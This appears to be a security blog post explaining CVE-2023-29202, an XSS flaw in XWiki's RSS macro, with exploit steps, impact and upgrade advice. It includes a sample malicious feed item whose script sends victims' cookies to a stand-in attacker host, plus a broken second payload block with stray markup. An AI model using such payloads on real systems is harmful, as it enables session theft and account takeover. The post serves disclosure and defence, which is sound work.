CVE-2023-29202 - Critical XSS in XWiki Commons RSS Macro—How It Works, Exploit, and Fixes

A critical security vulnerability—CVE-2023-29202—was discovered in XWiki Commons, affecting the bundled RSS macro. Attackers could inject malicious HTML and JavaScript content through crafted RSS feeds, leading to cross-site scripting (XSS) attacks. In worst-case scenarios, if exploited by a user with programming rights, this flaw could escalate to remote code execution, information theft, and even full sabotage of your wiki.

This in-depth post explains what CVE-2023-29202 is, how the exploit works, code snippets showing the vulnerability, ways attackers can abuse it, and how to stay safe—with exclusive, easy-to-understand explanations.

What is XWiki Commons and the RSS Macro?

XWiki is a popular open-source wiki platform. The XWiki Commons package includes shared libraries, and the RSS macro lets users embed RSS feed content directly into wiki pages. You use it like this:

{{rss url="https://somefeed.com/rss"; content="true"/}}

Setting content=true tells XWiki to display the full contents of RSS items—not just titles or descriptions.

The Vulnerability Explained

In affected XWiki versions, when content is set to true, the RSS macro injects the _raw_ feed content into the HTML output without sanitizing it.

If someone points the RSS macro to a malicious feed containing <script> tags, arbitrary JavaScript runs as soon as a user views the page. This is classic XSS—except potentially more dangerous in XWiki, as users with “programming rights” can trigger scripts with powerful permissions.

Here’s a simplified look at what went wrong (not exact XWiki source, but illustrative)

// Hypothetical vulnerable snippet
String feedContent = fetchRSSContent(feedUrl);
if (displayContent) {
    // Oops! Directly inserts content, no HTML cleanup!
    wikiPageOutput.append(feedContent);
}

No call to a sanitizer like Jsoup or built-in cleaning mechanism is used before outputting to the page.

Suppose you’re an attacker who controls an RSS feed. You craft a malicious item like

<item>
  <title>Evil Post</title>
  <description><![CDATA[
    <h1>You've been hacked!</h1>
    <script>
      // Steal cookies, send to attacker's server
      fetch('https://badguy.com/log?cookie='+encodeURIComponent(document.cookie));
    </script>
  ]]></description>
</item>

You then embed this feed into a wiki page with

{{rss url="https://evil.com/rss.xml"; content="true"/}}

Anyone viewing the page—especially with higher privileges—would silently execute the JavaScript. Now, as XWiki is a rich collaborative platform, privileges could be abused for:

- Privilege escalation: Scripts can issue wiki API requests by exploiting the session, granting higher access.
- Remote code execution: With programming rights, malicious scripts can execute powerful server-side actions.

Malicious Feed

Attack!

alert('XSS by CVE-2023-29202!')

]]>

     
   

`

{{rss url="https://malicious.example/rss.xml" content="true"/}}

Visit the page

Any user who visits will trigger the alert—and a real attacker could swap the alert for malicious JavaScript like stealing session cookies or performing wiki actions using the victim’s credentials.

Security Impact

Severity:  
This is high/critical—especially if programming rights are involved.

Information disclosure, data loss, and sabotage

Affected Versions:  
All XWiki versions before 14.6 RC1, with the RSS macro enabled.

The Fix

The vulnerability is patched in XWiki 14.6 RC1 and newer. Now, feed contents are properly cleaned to strip out scripts and dangerous HTML.

From the official advisory:

> “The content of the feed is now properly cleaned before being displayed.”

Sanitization Example (conceptual)

String safeContent = htmlSanitizer.clean(feedContent);
// Only append safe HTML to page now!
wikiPageOutput.append(safeContent);

`

WEB-INF/lib/xwiki-platform-rendering-macro-rss-XX.jar

References and More Reading

- Official XWiki Security Advisory
- NVD entry for CVE-2023-29202
- XWiki RSS Macro Documentation
- OWASP Cross-site Scripting (XSS) Guide

Conclusion

CVE-2023-29202 is a severe XSS vulnerability in XWiki’s RSS macro before 14.6 RC1, where raw feed content could inject malicious HTML or JavaScript. With XWiki’s powerful permission system, exploiting this can have dire consequences, from simple defacement to complete system takeover.

Upgrade your XWiki now to 14.6 RC1 or later. If you cannot upgrade, uninstall the RSS macro or limit programming rights. Don’t let your wiki be the next victim of this critical flaw.

Stay safe, keep your software patched, and review third-party content!

Timeline

Published on: 04/15/2023 15:15:00 UTC
Last modified on: 04/25/2023 18:55:00 UTC